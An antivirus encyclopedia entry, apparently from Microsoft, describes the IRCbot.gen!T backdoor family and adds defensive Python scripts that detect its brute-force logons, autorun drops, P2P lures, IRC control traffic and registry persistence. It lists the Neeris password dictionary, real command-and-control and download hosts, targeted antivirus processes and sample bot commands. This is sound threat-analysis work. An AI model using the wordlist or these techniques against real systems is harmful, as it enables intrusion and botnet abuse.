Backdoor:Win32/IRCbot.gen!T is a generic detection which may detect several variants of families of IRC-controlled backdoors. These malware allow unauthorized access and control of an affected computer and may be used to perform certain activities when commanded to do so by the backdoor’s controller, such as downloading and executing arbitrary files, or collecting system information.
Variants of the following families of malware may be detected with this name:
Please see the related family or example variant descriptions elsewhere in this encyclopedia for more detailed information on these threats.
Installation
When executed, malware detected as Backdoor:Win32/IRCbot.gen!T typically copies itself using a filename that differs according to variant to the %windir% directory or one of its subdirectories, such as the <system folder>. It also generally makes additional system changes to ensure that it runs upon system startup. For example, it may create a registry entry under a location such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run pointing to a copy of the malware.
For example, one variant copies itself to %windir%\mslsrv32.exe and makes the following registry modifications:
Sets value: "Microsoft Driver Setup"
With data: "%windir%\mslsrv32.exe"
To subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Sets value: "Microsoft Driver Setup"
With data: "%windir%\mslsrv32.exe"
To subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
Spreads via…
Variable methods
Malware detected as Backdoor:Win32/IRCbot.gen!T typically attempts to spread to other systems on the network when commanded to do so by the backdoor’s controller. Spreading methods may include exploiting weak passwords, exploiting vulnerabilities in unpatched systems, using instant messaging applications, utilizing the autorun feature, or peer to peer file sharing.
Exploits
Some variants attempt to exploit particular vulnerabilities in order to spread. For example, Win32/Neeris may attempt to spread by generating IP addresses in its local network and attempting to exploit systems unpatched against the vulnerabilities addressed in the following Microsoft Security Bulletins:
Neeris may also target computers running Microsoft SQL Server. It attempts to log on to these computers by exploiting weak passwords. One variant was observed to use the following list of passwords and usernames carried in its code:
007
1
12
123
1234
12345
123456
1234567
12345678
123456789
1234567890
2000
2001
2002
2003
2004
access
accounting
accounts
adm
admin
administrador
administrat
administrateur
administrator
admins
asd
backup
bill
bitch
blank
bob
bob
brian
changeme
chris
cisco
compaq
control
data
database
databasepass
databasepassword
db1
db1234
db2
dbpass
dbpassword
default
dell
demo
domain
domainpass
domainpassword
eric
exchange
fred
f*ck
george
god
guest
hell
hello
home
homeuser
hp
ian
ibm
internet
internet
intranet
jen
joe
john
kate
katie
lan
lee
linux
login
loginpass
luke
mail
main
mary
mike
neil
nokia
none
null
oem
oeminstall
oemuser
office
oracle
orainstall
outlook
pass
pass1234
passwd
password
password1
peter
peter
pwd
qaz
qwe
qwerty
root
sa
sam
server
sex
siemens
slut
sql
sqlpassoainstall
staff
student
sue
susan
system
teacher
technical
test
unix
user
web
win2000
win2k
win98
windows
winnt
winpass
winxp
www
zxc
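A Neeris-style sweep against SQL Server leaves a distinctive trail in the SQL Server ERRORLOG: a burst of "Login failed for user" lines from one client address, cycling through names from the list above, sometimes ending in a success. The script below is an added example written for this page, not code from the original description, that parses such lines and flags any client reaching a failure threshold inside a sliding time window. The log lines are constructed for the example in the ERRORLOG line layout; the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG lines for the example (not from a real server).
# 192.168.1.77 behaves like the Neeris sweep: several usernames from the list
# in a couple of seconds, then a successful 'sa' logon. 10.0.0.5 is a typo.
SAMPLE_ERRORLOG = """\
2009-03-04 10:15:01.10 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.77]
2009-03-04 10:15:01.31 Logon       Login failed for user 'admin'. [CLIENT: 192.168.1.77]
2009-03-04 10:15:01.52 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.77]
2009-03-04 10:15:01.73 Logon       Login failed for user 'root'. [CLIENT: 192.168.1.77]
2009-03-04 10:15:01.94 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.77]
2009-03-04 10:15:02.15 Logon       Login failed for user 'oracle'. [CLIENT: 192.168.1.77]
2009-03-04 10:15:02.36 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.77]
2009-03-04 10:15:02.57 Logon       Login succeeded for user 'sa'. Connection: Non-Trusted. [CLIENT: 192.168.1.77]
2009-03-04 10:30:00.00 Logon       Login failed for user 'dbuser'. [CLIENT: 10.0.0.5]
2009-03-04 11:30:00.00 Logon       Login failed for user 'dbuser'. [CLIENT: 10.0.0.5]
"""

LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']*)'.*?"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_logon_events(text):
    """Turn ERRORLOG text into a list of logon events; other lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOGON_RE.match(line)
        if m:
            events.append({
                "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
                "outcome": m.group("outcome"),
                "user": m.group("user"),
                "client": m.group("client"),
            })
    return events


def find_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Return {client: summary} for every client whose failed logons reach
    `threshold` inside any `window`-long span. The summary also records whether
    a later success occurred, i.e. whether one of the guessed passwords worked."""
    by_client = defaultdict(list)
    for event in events:
        by_client[event["client"]].append(event)

    alerts = {}
    for client, client_events in by_client.items():
        client_events.sort(key=lambda e: e["ts"])
        fails = [e for e in client_events if e["outcome"] == "failed"]
        # Sliding window over the sorted failure timestamps.
        best, start = 0, 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            best = max(best, end - start + 1)
        if best < threshold:
            continue
        successes = [e for e in client_events
                     if e["outcome"] == "succeeded" and e["ts"] >= fails[0]["ts"]]
        alerts[client] = {
            "max_failures_in_window": best,
            "users_tried": sorted({e["user"] for e in fails}),
            "followed_by_success": bool(successes),
            "success_user": successes[0]["user"] if successes else None,
        }
    return alerts


def scan_errorlog(text, threshold=5, window=timedelta(seconds=60)):
    return find_bruteforce(parse_logon_events(text), threshold, window)


if __name__ == "__main__":
    for client, summary in scan_errorlog(SAMPLE_ERRORLOG).items():
        print(client, summary)
```

A client that trips the threshold and is then followed by a success is the case to escalate first: the host is no longer being scanned, it has been logged into.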
Instant Messaging
Some variants may use other methods of spreading such as via instant messaging programs. For example, Win32/Slenfbot uses the following method to spread via MSN Messenger:
When the attacker orders Win32/Slenfbot to spread via MSN Messenger, they must provide the following three parameters:
- A URL containing a list of possible messages to send, along with the worm itself, to MSN Messenger contacts. The worm chooses from this list at random.
- A file name for a ZIP archive. The worm creates a ZIP archive containing a copy of itself in the temporary folder with this name. The worm sends this ZIP archive to MSN Messenger contacts.
- A file name for the worm's executable inside the ZIP archive.
Removable drives
Other variants spread by copying themselves to removable drives. For example, Win32/Rimecud performs the following actions when spreading via removable drives:
The spreading component of Win32/Rimecud enumerates all drives from B: to Z: searching for fixed and removable drives.
If one is found, the worm copies itself to the root directory of the located drive and creates an autorun.inf file to execute the copy. When the removable or networked drive is accessed from another machine with the Autorun feature enabled, the malware is launched automatically. For example, it may create the following files:
The payload component also has the ability to spread via autorun.inf when instructed to do so. In this case, the worm copies itself to a removable drive and creates an autorun.inf to execute it, for example:
- RECYCLER\autorun.exe
- autorun.inf
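The autorun.inf dropped by Win32/Rimecud is a plain INI file, so the launch entries it contains can be checked offline before the drive is ever mounted on an Autorun-enabled machine. The parser below is an added example, not code from the original description: it reads the [autorun] section, collects every key that can launch a program (open, shellexecute and shell\<verb>\command) and reports why the file looks like worm persistence rather than a vendor disc. Both input files are constructed for the example; the only path in them taken from the description is RECYCLER\autorun.exe.

```python
import ntpath
import re

# Constructed autorun.inf modeled on the RECYCLER\autorun.exe drop described
# above (example input, not a file taken from a real infection).
MALICIOUS_AUTORUN_INF = r"""[autorun]
open=RECYCLER\autorun.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
action=Open folder to view files
shell\open\command=RECYCLER\autorun.exe
shell\explore\command=RECYCLER\autorun.exe
shellexecute=RECYCLER\autorun.exe
UseAutoPlay=1
"""

# Constructed benign autorun.inf of the kind shipped on driver CDs.
BENIGN_AUTORUN_INF = r"""[autorun]
icon=setup.exe,0
label=Driver CD
"""

DIRECT_LAUNCH_KEYS = {"open", "shellexecute"}
VERB_COMMAND_RE = re.compile(r"^shell\\[^\\]+\\command$")
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js", ".wsf"}
RECYCLE_DIRS = {"recycler", "recycled", "$recycle.bin"}


def parse_autorun_inf(text):
    """Return the [autorun] section as a dict with lowercased keys.
    Hand-rolled rather than configparser so that junk lines, duplicate keys
    and odd spacing (all common in dropped files) do not abort parsing."""
    values = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def command_image(value):
    """Program path from a command value: the quoted part if quoted,
    otherwise the first token (arguments dropped)."""
    value = value.strip()
    if value.startswith('"'):
        return value[1:].split('"', 1)[0]
    return value.split()[0] if value else ""


def assess_autorun(text):
    """Classify an autorun.inf: which keys launch something, what they launch,
    and why it looks like worm persistence."""
    values = parse_autorun_inf(text)
    launches = []
    for key, value in values.items():
        if key in DIRECT_LAUNCH_KEYS or VERB_COMMAND_RE.match(key):
            image = command_image(value)
            reasons = []
            if ntpath.splitext(image)[1].lower() in EXECUTABLE_EXTS:
                reasons.append("launches an executable")
            if ntpath.basename(ntpath.dirname(image)).lower() in RECYCLE_DIRS:
                reasons.append("payload hidden in a recycle-bin folder")
            launches.append({"key": key, "image": image, "reasons": reasons})
    suspicious = any(launch["reasons"] for launch in launches)
    # An 'action' text next to a launch entry makes the AutoPlay prompt imitate
    # Windows' own "Open folder to view files" item, a common disguise.
    disguised = suspicious and "action" in values
    return {"launches": launches, "suspicious": suspicious, "disguised_as_folder": disguised}


if __name__ == "__main__":
    for sample in (MALICIOUS_AUTORUN_INF, BENIGN_AUTORUN_INF):
        print(assess_autorun(sample))
```

The shell\<verb>\command form matters because it fires when the user double-clicks the drive in Explorer or picks "Explore", even on machines where the open= handler is disabled.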
Peer-to-Peer file sharing
Yet other variants may attempt to spread via peer-to-peer file sharing. Win32/Pushbot, for example, may be ordered to spread by copying itself to the shared directories of various peer-to-peer file sharing programs, using filenames such as the following:
Windows Live Password reveal.exe
Leona-Lewis-Bleeding-love.mp3.www-freemp3s.com
eMule-0-48a-VeryCD080902-Update.exe
MsnCleaner.exe
KEY-GEN Adobe PhotoShop CS3.exe
KEY-GEN Kaspersky 2009.exe
KEY-GEN ESET NOD32 3.0.650.exe
KEY-GEN Ahead Nero 8 Ultra Edition.exe
Microsoft Office 2007.exe
Kaspersky 7.0 all versions.exe
windows xp genuine keygen.exe
windows xp activation hack 2008.exe
windows xp activation hack 2007.exe
Directories used may include:
%ProgramFiles%\Ares\My Shared Folder\
%ProgramFiles%\Direct Connect\Received Files\
%ProgramFiles%\KMD\My Shared Folder\
%ProgramFiles%\Rapigator\Share\
%ProgramFiles%\XoloX\Downloads\
%ProgramFiles%\Tesla\Files\
%ProgramFiles%\WinMX\My Shared Folder\
%ProgramFiles%\Swaptor\Download\
%ProgramFiles%\Overnet\incoming\
%ProgramFiles%\LimeWire\Shared\
%ProgramFiles%\appleJuice\incoming\
%ProgramFiles%\Filetopia3\Files\
%ProgramFiles%\ICQ\shared files\
%ProgramFiles%\Shareaza\Downloads\
%ProgramFiles%\BearShare\Shared\
%ProgramFiles%\eMule\Incoming\
%ProgramFiles%\Gnucleus\Downloads\
%ProgramFiles%\EDONKEY2000\incoming\
%ProgramFiles%\Morpheus\My Shared Folder\
%ProgramFiles%\Grokster\My Grokster\
%ProgramFiles%\Kazaa Lite\My Shared Folder\
%ProgramFiles%\Kazaa\My Shared Folder\
\My Shared Folder\
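The Pushbot lure names and share folders listed above suggest a sweep of the share directories themselves. The script below is an added example, not the page's own code, that walks a subset of those directories under a %ProgramFiles% stand-in and reports files with lure names, a media extension followed by trailing text, or the same bytes dropped into several share folders; the last is the most reliable signal, since genuine downloads differ from each other while a worm copies one body everywhere. The directory tree and file contents are constructed in a temporary folder; the inert byte string standing in for the worm body is not malware.

```python
import hashlib
import os
import re
import tempfile
from collections import defaultdict

# Subset of the share directories listed above, relative to %ProgramFiles%.
# Extend with the rest of the list for a real sweep.
SHARE_DIRS = [
    r"Ares\My Shared Folder",
    r"LimeWire\Shared",
    r"eMule\Incoming",
    r"Kazaa\My Shared Folder",
    r"Shareaza\Downloads",
]
BAIT_NAME_RE = re.compile(r"key-?gen|crack|activation hack|password reveal", re.I)
# A media or archive extension followed by more text, e.g. "song.mp3.www-site.com".
TRAILING_AFTER_MEDIA_RE = re.compile(r"\.(mp3|avi|wmv|mpg|jpg|zip)\.[^.]", re.I)


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_share_dirs(program_files, share_dirs=SHARE_DIRS):
    """Walk the known P2P share folders under `program_files` and return the
    files that look like worm bait, each with the reasons it was flagged."""
    records = []
    by_digest = defaultdict(list)
    for rel in share_dirs:
        folder = os.path.join(program_files, *rel.split("\\"))
        if not os.path.isdir(folder):
            continue
        for name in sorted(os.listdir(folder)):
            path = os.path.join(folder, name)
            if not os.path.isfile(path):
                continue
            reasons = []
            if BAIT_NAME_RE.search(name):
                reasons.append("lure filename")
            if TRAILING_AFTER_MEDIA_RE.search(name):
                reasons.append("media extension followed by trailing text")
            digest = sha256_of(path)
            by_digest[digest].append(path)
            records.append({"path": path, "name": name, "digest": digest, "reasons": reasons})
    # Second pass: one body copied into several share folders.
    for rec in records:
        copies = by_digest[rec["digest"]]
        if len(copies) > 1:
            rec["reasons"].append("identical content in %d share folders" % len(copies))
    return [rec for rec in records if rec["reasons"]]


def build_fixture(root):
    """Create a constructed %ProgramFiles% tree for the demo. The 'payload' is
    an inert stand-in byte string, not malware."""
    payload = b"MZ" + b"\x90" * 64
    files = {
        r"Ares\My Shared Folder\KEY-GEN Adobe PhotoShop CS3.exe": payload,
        r"LimeWire\Shared\Leona-Lewis-Bleeding-love.mp3.www-freemp3s.com": payload,
        r"eMule\Incoming\windows xp genuine keygen.exe": payload,
        r"Shareaza\Downloads\eMule-0-48a-VeryCD080902-Update.exe": payload,
        r"Kazaa\My Shared Folder\holiday.jpg": b"\xff\xd8\xff\xe0 constructed photo bytes",
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("\\"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    return root


def demo():
    with tempfile.TemporaryDirectory() as root:
        return scan_share_dirs(build_fixture(root))


if __name__ == "__main__":
    for rec in demo():
        print(rec["name"], "->", ", ".join(rec["reasons"]))
```

Note that the eMule update lookalike carries no lure keyword and no fake extension; it is caught only because its bytes match the other three drops.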
Payload
Allows backdoor access and control
Once installed, the malware connects to an IRC server with a specified location and port. Please note that the ports and remote hosts used for this purpose are completely variable and may be different for each iteration of this threat. For example, one variant attempts to connect on port 8585 to cos.chfo991.com, while another attempts to connect on port 51987 to teamdos.org.
After connecting, the malware awaits commands from the backdoor's controller. These commands may include (but are not limited to) the following examples:
- Download and execute arbitrary files
- Update itself
- Start or stop spreading
- Collect system information
- Run various servers on the system
- Send email or instant messages
- Participate in Distributed Denial of Service attacks
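Because the control channel is plain IRC, a captured session reveals the nick the bot chose, the channel it joined and the controller's orders. The parser below is an added example, not the page's own code: it splits RFC 1459 lines into prefix, command and parameters and maps the controller's PRIVMSG text onto the capability list above. The session is constructed; the dot-prefixed command verbs (.download, .scan, .ddos and so on), the bot nick pattern and the server port are assumptions, since the description does not publish this family's command syntax, and a real sample needs its own table.

```python
import re
from dataclasses import dataclass

STANDARD_IRC_PORTS = {6665, 6666, 6667, 6668, 6669, 6697, 7000}

# Hypothetical bot command verbs mapped to the capabilities listed above. The
# real IRCbot.gen!T syntax is not published on this page; these are placeholders.
COMMAND_CAPABILITIES = {
    ".download": "Download and execute arbitrary files",
    ".update": "Update itself",
    ".scan": "Start or stop spreading",
    ".sysinfo": "Collect system information",
    ".httpd": "Run various servers on the system",
    ".msn": "Send email or instant messages",
    ".ddos": "Participate in Distributed Denial of Service attacks",
}

# Nicks like [USA|XP|12345] (country|OS|number) are a common bot convention;
# treat the pattern as a heuristic, not a rule.
BOT_NICK_RE = re.compile(r"^\[[^|\]]+\|[^|\]]+\|\d+\]$")


@dataclass
class IrcMessage:
    prefix: str
    command: str
    params: list


def parse_irc_line(line):
    """Split one RFC 1459 line into prefix, command and params; the trailing
    parameter after ' :' is kept whole, spaces included."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    params = parts[1:]
    if trailing is not None:
        params.append(trailing)
    return IrcMessage(prefix, parts[0].upper() if parts else "", params)


# Constructed session: ("C", ...) is bot -> server, ("S", ...) is server -> bot.
SAMPLE_SESSION = [
    ("C", "NICK [USA|XP|12345]"),
    ("C", "USER xpuser 0 * :xpuser"),
    ("S", ":irc.example.test 001 [USA|XP|12345] :Welcome"),
    ("C", "JOIN #bots s3cretkey"),
    ("S", ":[USA|XP|12345]!xpuser@10.1.2.3 JOIN :#bots"),
    ("S", ":boss!boss@ctl.example.test PRIVMSG #bots :.download http://www.example.test/u.exe c:\\u.exe 1"),
    ("S", ":boss!boss@ctl.example.test PRIVMSG #bots :.scan.start 192.168.1.0 22 0"),
    ("S", ":boss!boss@ctl.example.test PRIVMSG #bots :.ddos.syn 203.0.113.9 80 600"),
    ("S", "PING :irc.example.test"),
    ("C", "PONG :irc.example.test"),
]


def summarize_session(session, server_port):
    """Reconstruct what the bot did and what it was told to do, plus the
    indicators an analyst would put in a report."""
    nick = channel = None
    commands = []
    for direction, raw in session:
        msg = parse_irc_line(raw)
        if direction == "C" and msg.command == "NICK" and msg.params:
            nick = msg.params[0]
        elif direction == "C" and msg.command == "JOIN" and msg.params:
            channel = msg.params[0]
        elif direction == "S" and msg.command == "PRIVMSG" and len(msg.params) >= 2:
            text = msg.params[1]
            verb = text.split()[0].lower() if text.split() else ""
            for key, capability in COMMAND_CAPABILITIES.items():
                if verb.startswith(key):
                    commands.append({"from": msg.prefix.split("!")[0],
                                     "text": text, "capability": capability})
                    break
    indicators = []
    if server_port not in STANDARD_IRC_PORTS:
        indicators.append("IRC on non-standard port %d" % server_port)
    if nick and BOT_NICK_RE.match(nick):
        indicators.append("bot-style nick %s" % nick)
    if commands:
        indicators.append("controller issued %d recognised bot commands" % len(commands))
    return {"nick": nick, "channel": channel, "commands": commands, "indicators": indicators}


if __name__ == "__main__":
    print(summarize_session(SAMPLE_SESSION, server_port=8585))
```

The port check alone is weak evidence (the page itself notes the ports vary per variant), which is why the summary pairs it with the nick pattern and the decoded orders.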
Lowers system security settings
Some variants attempt to terminate security or AV related program processes, or may attempt to modify computer security settings. The processes targeted and settings modified are highly variable.
For example, one variant attempts to kill the following processes:
mrt.exe
ccenter.exe
fsav.exe
kav.exe
Kavstart.exe
KVSrvXP.exe
KvXP.kxp
msmpeng.exe
nod32.exe
Another variant disables the Task Manager by modifying the following registry entry:
Sets value: "DisableTaskMgr"
With data: "1"
To subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
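Both the Run-key persistence from the Installation section and the DisableTaskMgr policy above are ordinary registry values, so a `reg export` of the relevant keys from a suspect machine can be triaged offline. The script below is an added example, not from the original description: it parses .reg text and flags autostart entries whose program sits directly in %windir%, entries matching the value name and file name given in the Installation section, and the Task Manager policy. The export text is constructed for the example (the VMware Tools entry is a benign control); the set of autostart keys it checks is a starting point, not the complete list Windows honours.

```python
import ntpath
import re

# Constructed `reg export` text combining the Run-key entries from the
# Installation section with the DisableTaskMgr policy (example data; the
# VMware Tools entry is a benign control).
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Driver Setup"="%windir%\\mslsrv32.exe"
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"Microsoft Driver Setup"="%windir%\\mslsrv32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"""

# Autostart keys checked (a starting point, not every location Windows honours).
AUTOSTART_KEYS = [
    r"hklm\software\microsoft\windows\currentversion\run",
    r"hklm\software\microsoft\windows\currentversion\runonce",
    r"hklm\software\microsoft\windows\currentversion\policies\explorer\run",
    r"hkcu\software\microsoft\windows\currentversion\run",
]
SYSTEM_POLICY_KEY = r"hklm\software\microsoft\windows\currentversion\policies\system"
HIVE_ALIASES = {"hkey_local_machine": "hklm", "hkey_current_user": "hkcu"}
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def _decode_value(raw):
    """Decode the right-hand side of a .reg value line (strings and DWORDs)."""
    raw = raw.strip()
    if raw.startswith('"') and raw.endswith('"'):
        return re.sub(r"\\(.)", r"\1", raw[1:-1])  # undo \\ and \" escapes
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    return raw  # hex:/hex(n): blobs are left undecoded


def parse_reg_export(text):
    """Parse .reg text into {normalised_key: {value_name: value}} with hive
    names shortened (HKEY_LOCAL_MACHINE -> hklm) and keys lowercased."""
    reg, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            hive, _, rest = line[1:-1].partition("\\")
            current = HIVE_ALIASES.get(hive.lower(), hive.lower()) + "\\" + rest.lower()
            reg[current] = {}
            continue
        m = VALUE_RE.match(line)
        if current is not None and m:
            name = "(default)" if m.group(1) is None else re.sub(r"\\(.)", r"\1", m.group(1))
            reg[current][name] = _decode_value(m.group(2))
    return reg


def command_image(command):
    """Program path from a Run value: the quoted part, or the first token."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split()[0] if command else ""


def in_windows_root(image):
    """True when the program sits directly in %windir% rather than a subfolder;
    legitimate software almost never does this, this family's droppers do."""
    low = image.lower()
    for prefix in ("%windir%\\", "%systemroot%\\", "c:\\windows\\"):
        if low.startswith(prefix):
            return "\\" not in low[len(prefix):]
    return False


def triage(reg):
    """List autostart entries with the flags an analyst would raise, plus the
    Task Manager policy if it is set."""
    findings = []
    for key in AUTOSTART_KEYS:
        for name, command in reg.get(key, {}).items():
            image = command_image(str(command))
            flags = []
            if in_windows_root(image):
                flags.append("executable directly in %windir%")
            if name == "Microsoft Driver Setup" or ntpath.basename(image).lower() == "mslsrv32.exe":
                flags.append("matches the IRCbot.gen!T variant described above")
            findings.append({"key": key, "name": name, "image": image, "flags": flags})
    if reg.get(SYSTEM_POLICY_KEY, {}).get("DisableTaskMgr") == 1:
        findings.append({"key": SYSTEM_POLICY_KEY, "name": "DisableTaskMgr", "image": None,
                         "flags": ["Task Manager disabled by policy"]})
    return findings


if __name__ == "__main__":
    for finding in triage(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(finding["name"], finding["image"], finding["flags"])
```

The policies\Explorer\Run key is worth including explicitly: it is honoured at logon like the ordinary Run key but is missed by tools that only enumerate the latter.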
Downloads and executes arbitrary files
Some variants may attempt to download and install additional malicious files. For example, one variant was observed attempting to contact the following remote hosts for this purpose:
- www.cooleasy.com
- www.mcreate.net
- kuwago.hp.infoseek.co.jp
- www.cship.info
Analysis by Lena Lin
Take the following steps to help prevent infection on your system:
- Enable a firewall on your computer.
- Get the latest computer updates for all your installed software.
- Use up-to-date antivirus software.
- Use caution when opening attachments and accepting file transfers.
- Use caution when clicking on links to web pages.
- Avoid downloading pirated software.
- Protect yourself against social engineering attacks.
- Use strong passwords.
Enable a firewall on your computer
Use a third-party firewall product or turn on the Microsoft Windows Internet Connection Firewall.
To turn on the Windows Firewall in Windows Vista
- Click Start, and click Control Panel.
- Click Security.
- Click Turn Windows Firewall on or off.
- Select On.
- Click OK.
To turn on the Internet Connection Firewall in Windows XP
- Click Start, and click Control Panel.
- Click Network and Internet Connections. If you do not see Network and Internet Connections, click Switch to Category View.
- Click Change Windows Firewall Settings.
- Select On.
- Click OK.
Get the latest computer updates
Updates help protect your computer from viruses, worms, and other threats as they are discovered. It is important to install updates for all the software that is installed in your computer. These are usually available from vendor websites.
You can use the Automatic Updates feature in Windows to automatically download future Microsoft security updates while your computer is on and connected to the Internet.
To turn on Automatic Updates in Windows Vista
- Click Start, and click Control Panel.
- Click System and Maintenance.
- Click Windows Update.
- Select a setting. Microsoft recommends selecting Install updates automatically and choosing a time that is convenient for you. If you do not choose Automatic, but you choose to be notified when updates are ready, a notification balloon appears when new downloads are available to install. Click the notification balloon to review and install the updates.
To turn on Automatic Updates in Windows XP
- Click Start, and click Control Panel.
- Click System.
- Click Automatic Updates.
- Select a setting. Microsoft recommends selecting Automatic. If you do not choose Automatic, but you choose to be notified when updates are ready, a notification balloon appears when new downloads are available to install. Click the notification balloon to review and install the updates.
Use up-to-date antivirus software
Most antivirus software can detect and prevent infection by known malicious software. To help protect you from infection, you should always run antivirus software that is updated with the latest signature files. Antivirus software is available from several sources. For more information, see http://www.microsoft.com/protect/computer/viruses/vista.mspx.
Use caution when opening attachments and accepting file transfers
Exercise caution with e-mail and attachments received from unknown sources, or received unexpectedly from known sources. Use extreme caution when accepting file transfers from known or unknown sources.
Use caution when clicking on links to web pages
Exercise caution with links to web pages that you receive from unknown sources, especially if the links are to a web page that you are not familiar with or are suspicious of. Malicious software may be installed in your system simply by visiting a web page with harmful content.
Avoid downloading pirated software
Threats may also be bundled with software and files that are available for download on various torrent sites. Downloading "cracked" or "pirated" software from these sites carries not only the risk of being infected with malware, but is also illegal. For more information, see 'The risks of obtaining and using pirated software'.
Protect yourself from social engineering attacks
While attackers may attempt to exploit vulnerabilities in hardware or software in order to compromise a system, they also attempt to exploit vulnerabilities in human behavior in order to do the same. When an attacker attempts to take advantage of human behavior in order to persuade the affected user to perform an action of the attacker's choice, it is known as 'social engineering'. Essentially, social engineering is an attack against the human interface of the targeted system. For more information, see 'What is social engineering?'.
Use Strong Passwords
Attackers may try to gain access to your Windows account by guessing your password. It is therefore important that you use a strong password – one that cannot be easily guessed by an attacker. A strong password is one that has at least 8 characters, and combines letters, numbers, and symbols. For more information, see http://www.microsoft.com/protect/yourself/password/create.mspx.
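The Neeris list in the Spreads via section is the attacker's dictionary, so the practical test of a SQL Server or Windows password is whether it, or a lightly dressed-up form of it, appears there, in addition to the length and character-class rule given here. The checker below is an added example, not part of the original guidance: it carries a representative subset of that list, undoes common digit and symbol substitutions before lookup, and applies the 8-character, letters-numbers-symbols rule. The substitution table and the sample accounts are assumptions made for the example.

```python
import re

# Representative subset of the username/password list Win32/Neeris carries
# (see Spreads via, above); extend with the full list for a real audit.
NEERIS_WORDLIST = {
    "1", "12", "123", "1234", "12345", "123456", "1234567", "12345678",
    "admin", "administrator", "backup", "changeme", "database", "dbpass",
    "default", "guest", "login", "oracle", "pass", "pass1234", "passwd",
    "password", "password1", "qwerty", "root", "sa", "server", "sql",
    "system", "test", "user", "windows",
}

# Assumed substitutions people use to dress up a dictionary word; undone before lookup.
LEET_MAP = str.maketrans({"@": "a", "0": "o", "1": "i", "3": "e", "$": "s", "5": "s", "!": "i"})


def normalise(password):
    """Strip trailing digits/symbols, lowercase and undo leet substitutions so
    that 'P@ssw0rd1' collapses to 'password' before the wordlist lookup."""
    base = re.sub(r"[^A-Za-z]+$", "", password)
    return base.lower().translate(LEET_MAP)


def audit_password(username, password):
    """Return the reasons a credential would fall to the Neeris sweep or fails
    the rule above (at least 8 characters combining letters, numbers and
    symbols). An empty list means it passes both checks."""
    reasons = []
    low = password.lower()
    if not password:
        reasons.append("blank password")
    elif low in NEERIS_WORDLIST:
        reasons.append("password is in the attacker's wordlist")
    elif normalise(password) in NEERIS_WORDLIST:
        reasons.append("password is a wordlist entry with digits/symbols bolted on")
    if password and low == username.lower():
        reasons.append("password equals username")
    if len(password) < 8:
        reasons.append("shorter than 8 characters")
    if not re.search(r"[A-Za-z]", password):
        reasons.append("no letters")
    if not re.search(r"\d", password):
        reasons.append("no digits")
    if not re.search(r"[^A-Za-z0-9]", password):
        reasons.append("no symbols")
    return reasons


def audit_accounts(accounts):
    """accounts: iterable of (username, password); returns {username: reasons}
    for every account that fails."""
    failures = {}
    for username, password in accounts:
        reasons = audit_password(username, password)
        if reasons:
            failures[username] = reasons
    return failures


# Constructed sample accounts for the demo (not real credentials).
SAMPLE_ACCOUNTS = [
    ("sa", "sa"),
    ("dbadmin", "P@ssw0rd1"),
    ("backup", "pass1234"),
    ("appsvc", "Tr0ub4dor&3x!"),
]

if __name__ == "__main__":
    for user, reasons in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(user, "->", "; ".join(reasons))
```

"P@ssw0rd1" satisfies the length and character-class rule yet still fails, which is the point of checking against the attacker's list and not only against composition rules.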